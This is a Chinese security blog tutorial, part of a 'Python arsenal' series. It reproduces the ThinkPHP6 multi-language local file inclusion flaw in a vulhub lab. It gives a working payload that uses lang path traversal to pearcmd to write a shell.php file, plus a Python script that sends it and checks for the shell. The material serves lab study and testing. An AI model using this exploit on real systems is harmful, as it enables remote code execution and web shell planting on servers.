Python武器库开发-武器库篇之ThinkPHP6 多语言本地文件包含漏洞(六十七)

最新推荐文章于 2024-09-08 11:36:03 发布
原创 最新推荐文章于 2024-09-08 11:36:03 发布 · 1.7k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #开发语言 #网络安全

Python武器库开发-武器库篇之ThinkPHP6 多语言本地文件包含漏洞(六十七)

漏洞环境搭建

这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。我们拿 lang-rce 漏洞举例,如果我们想要安装lang-rce 漏洞环境,可以 cd 到 lang-rce ,然后输入以下命令启动靶场环境:

docker-compose up -d

在这里插入图片描述

然后我们在浏览器输入 https://localhost:8084 就可以访问靶场环境

在这里插入图片描述

ThinkPHP6 多语言本地文件包含漏洞原理

ThinkPHP6 多语言本地文件包含漏洞原理是在使用ThinkPHP6框架时,如果开启了多语言功能且未对用户输入进行安全过滤,恶意用户可以通过构造恶意请求,将任意文件包含到系统中进行执行。

具体原理如下:

  1. 默认情况下,ThinkPHP6框架会在应用目录下的lang目录中存放多语言文件,文件名为语言标识符;

  2. 恶意用户可以通过构造请求,将恶意文件名作为语言标识符传入;

  3. ThinkPHP6框架在处理多语言功能时,会自动根据语言标识符加载对应的语言文件;

  4. 如果用户传入的语言标识符是恶意文件名,框架则会将该文件包含到系统中进行执行;

  5. 恶意文件可以是任意PHP代码,因此可以执行任意命令,包括读取敏感文件、执行系统命令等。

这个漏洞的产生主要是由于未对用户输入进行安全过滤和验证导致的,解决方法是对用户输入进行严格的过滤和验证,避免恶意用户传入恶意文件名。同时,应及时对框架进行升级,以获取最新的安全补丁。

ThinkPHP6 多语言本地文件包含漏洞POC

接下来我们给出ThinkPHP6 多语言本地文件包含漏洞的POC,代码内容如下:

?lang=../../../../../public/index
index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php

我们向URL路径上添加该POC得到如下的这么一个页面:

在这里插入图片描述

ThinkPHP6 多语言本地文件包含漏洞POC编写

现在我们用python编写检测ThinkPHP6 多语言本地文件包含漏洞的代码,内容如下:

#!/usr/bin/env python

import requests
from urllib.parse import urljoin

def thinkphp6_lang(url):
    payload = urljoin(url,'index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php')
    response = requests.get(payload, verify=False)
    url2 = url + 'shell.php'
    response2 = requests.get(url2, verify=False)
    if response2.status_code == 200:
        print('漏洞存在')
    else:
        print("漏洞不存在")

if __name__ == '__main__':
    url = 'http://localhost:8084/'
    thinkphp6_lang(url)

POC代码详细分析

这段代码是一个用于检测ThinkPHP6漏洞的Python脚本,它利用构造的URL参数来触发漏洞,检查目标URL是否受到该漏洞的影响。如果漏洞存在,则打印"漏洞存在",否则打印"漏洞不存在"。

  1. 脚本开头声明了使用Python解释器来运行脚本。

  2. 导入了requests库用于发送HTTP请求。

  3. 导入了urljoin函数,用于拼接URL。

  4. 定义了一个名为thinkphp6_lang的函数,接受一个参数url

  5. 在函数内部,使用urljoin函数将漏洞的payload拼接到给定的URL上。payload的构造是通过传递URL参数来触发ThinkPHP6的漏洞,出现文件包含和代码执行的情况。

  6. 使用requests.get方法发送带有构造好的payload的HTTP GET请求,并将响应存储在response变量中。verify=False是为了关闭SSL验证。

  7. 构造一个新的URL,结合原始URL和shell.php文件名。

  8. 使用requests.get方法发送带有新URL的HTTP GET请求,并将响应存储在response2变量中。

  9. 如果第二个请求的状态码为200,则打印"漏洞存在";否则打印"漏洞不存在"。

  10. 在主函数中,定义一个名为url的变量,并将其设置为本地主机的URL和端口。

  11. 调用thinkphp6_lang函数,将url作为参数传递进去。

运行效果图

如下是我们这串代码的实际运行效果图:

在这里插入图片描述

ThinkPHP 漏洞利用工具
05-18 3977
在Github上搜寻好用的安全工具,来充实武器库,实属一大乐趣所在。当看到ThinkPHP十年磨一剑的提示,那么今天这里分享的工具就可以派上用场了,一键检测ThinkPHP全版本漏洞。01、TPscan一键ThinkPHP漏洞检测,基于Python3,命令行检测,集成了14个常见的ThinkPHP框架漏洞检测插件。github项目地址:https://github.com...
通过ftp在Centos6和Centos7上搭建yum仓库
yonggeit的博客
04-20 3708
yum网络仓库的搭建 CentOS7yum -y install vsftpd systemctl start vsftpd [318][root@liyong: yum.repos.d]# systemctl enable vsftpdiptables -F systemctl stop firewalld.service systemctl disable firewalld.service r
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6
最新发布
gan_zi_ge的博客
09-08 3276
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。docker ps**漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。
Thinkphp6 反序列化漏洞分析
无问社区的博客
08-22 2056
小编对Thinkphp6 反序列化漏洞的分析和自己的总结,全有点长,可以互相交流一下
ThinkPHP Lang多语言本地文件包含漏洞(QVD-2022-46174)漏洞复现
weixin_45653478的博客
04-27 958
ThinkPHP是一个在中国使用较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当ThinkPHP开启了多语言功能时,攻击者可以通过lang参数和目录穿越实现文件包含,当存在其他扩展模块如 pear 扩展时,攻击者可进一步利用文件包含实现远程代码执行。影响版本。
thinkphp6文件写入漏洞
01-08
网络安全
Thinkphp6.0.x反序列化漏洞复现
shinygod的博客
11-20 2615
Thinkphp6.0.x反序列化漏洞复现
ThinkPHP v6.0.x反序列化漏洞复现与分析
m0_61083409的博客
06-18 2245
初始环境,需要注意的是,新版v6基于开发 使用进行安装 坑点,截止到 ,默认核心安装的为 但是到最后面部分代码段已经修复了利用点,所以为了避免大家再次踩坑,请部署完成后,请前往 中,修改核心依赖相关版本,回退更新 进行回退更新,没有出现报错即成功 开启web服务进行验证访问’ 注意:实际测试需要PHP版本>7.2.5**** 版本安装后默认使用单应用模式部署,url访问受到路由模式的影响,为了使用方便,我们先要去 中将 访问控制器中的方法名,并且传递参数值 需要编写一个控制器模块并存在反序列化可控点,这样
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6264
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
文件系统之格式化与挂载
yonggeit的博客
04-25 5853
文件系统 定义 文件系统类型 Linux 文件系统 光盘iso9660 Windows fat32 ntfs Unix FFS fast UFS unix JFS2 网络文件系统NFS CIFS 集群文件系统GFS2 OCFS2 oracle 分布式文件系统 RAW 未经处理或者未经格式化产生的文件系统 根据其是否支持journal 功能  日志型文件系统 ext3 ext4 xfs 非日志
ThinkPHP v6.0.7
04-21
V6.0.7版本发布,本版本主要针对上个版本做了一些路由修正,还意外收获了一些性能提升,是一个建议更新的版本。主要更新 修正Validate类的PHP8兼容性 改进redis驱动的append方法 修正路由匹配检测问题 优化路由变量正则规则生成 改进responseView的内容渲染 安装和更新 V6版本开始仅支持Composer安装及更新,支持上个版本的无缝更新,直接使用composer update 更新到最新版本即可。如果需要全新安装,使用:composer create-project topthink/think tpThinkPHP 是一个免费开源的,快速、简单的面向对象的 轻量级PHP开发框架 ,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领先和最具影响力的WEB应用开发框架,众多的典型案例确保可以稳定用于商业以及门户级的开发。全面的WEB开发特性支持最新的ThinkPHP为WEB应用开发提供了强有力的支持,这些支持包括:MVC支持-基于多层模型(M)、视图(V)、控制器(C)的设计模式ORM支持-提供了全功能和高性能的ORM支持,支持大部分数据库模板引擎支持-内置了高性能的基于标签库和XML标签的编译型模板引擎RESTFul支持-通过REST控制器扩展提供了RESTFul支持,为你打造全新的URL设计和访问体验云平台支持-提供了对新浪SAE平台和百度BAE平台的强力支持,具备“横跨性”和“平滑性”,支持本地化开发和调试以及部署切换,让你轻松过渡,打造全新的开发体验。CLI支持-支持基于命令行的应用开发RPC支持-提供包括PHPRpc、HProse、jsonRPC和Yar在内远程调用解决方案MongoDb支持-提供NoSQL的支持缓存支持-提供了包括文件、数据库、Memcache、Xcache、Redis等多种类型的缓存支持安全性框架在系统层面提供了众多的安全特性,确保你的网站和产品安全无忧。这些特性包括:XSS安全防护表单自动验证强制数据类型转换输入数据过滤表单令牌验证防SQL注入图像上传检测
红队攻防渗透技术实战流程:框架安全:Laravel&Thinkphp&Struct2&SpringBoot
HACKONE的博客
06-15 238
Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为J2EE应用程序开发提供了一个好用的框架。参考:https://cloud.tencent.com/developer/article/2164533。参考:https://www.csdn.net/article/2022-11-24/128026635。参考:https://developer.aliyun.com/article/1160011。-访问jsp触发后门。
ThinkPHP 多语言模块RCE漏洞复现
0xSec
12-25 3931
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,40道网络安全面试
m0_60721823的博客
04-06 1371
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(
vulhub中ThinkPHP 多语言本地文件包含漏洞复现
yougexiaojiuguan的博客
03-06 623
漏洞复现的记录,
ThinkPHP Lang文件包含To远程代码执行漏洞复现—CNVD-2022-86535
afei001
12-14 1550
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。ThinkPHP存在命令执行漏洞,该漏洞是由于开启了多语言功能,对参数lang传参过滤不严谨,攻击者可利用该漏洞执行命令。本质是ThinkPHP在开启多语言功能的情况下存在文件包含漏洞,攻击者可以通过get、header、cookie等位置传入参数,ThinkPHP LoadLangPack中存在目录穿越漏洞,然后再利用pearcmd文件包含并结合它的指令config-create创建恶意代码,从而实现远程代码执行。
[GYCTF2020]EasyThinking Thinkphp6.0任意文件操作漏洞 绕过disable_function
scrawman的博客
11-28 2516
[GYCTF2020]EasyThinking 一开始还以为是XSS漏洞,因为搜索记录会被保存。后来查了才知道是Thinkphp 6.0框架的任意文件操作漏洞。先注册一个账号登录,登录时抓包修改Session id为php文件名,长度是32位 session文件在/runtime/session/目录下,这是默认的。文件名是sess_加我们刚刚写的32位字符串:sess_0123456789012345678901234567.php。 我们可以先来看一下此时这个文件里有什么 然后我们搜索一下再看这个文
ThinkPHP多语言模块文件包含RCE复现详细教程
ALLEN'Blog
02-14 2304
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
ThinkPHP V6.0反序列化漏洞复现
WDWAGAAFGAGDADSA的博客
12-11 4767
TP6反序列化漏洞复现
ThinkPHP6框架实战开发企业网站教程
课程内容包括ThinkPHP6的架构优化、规范使用、理论知识的实践应用,以及使用TP6框架开发高端扁平化后台界面。" ThinkPHP是一款流行的开源PHP开发框架,由国内开发者团队开发,它的设计理念是简化WEB应用的开发流程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值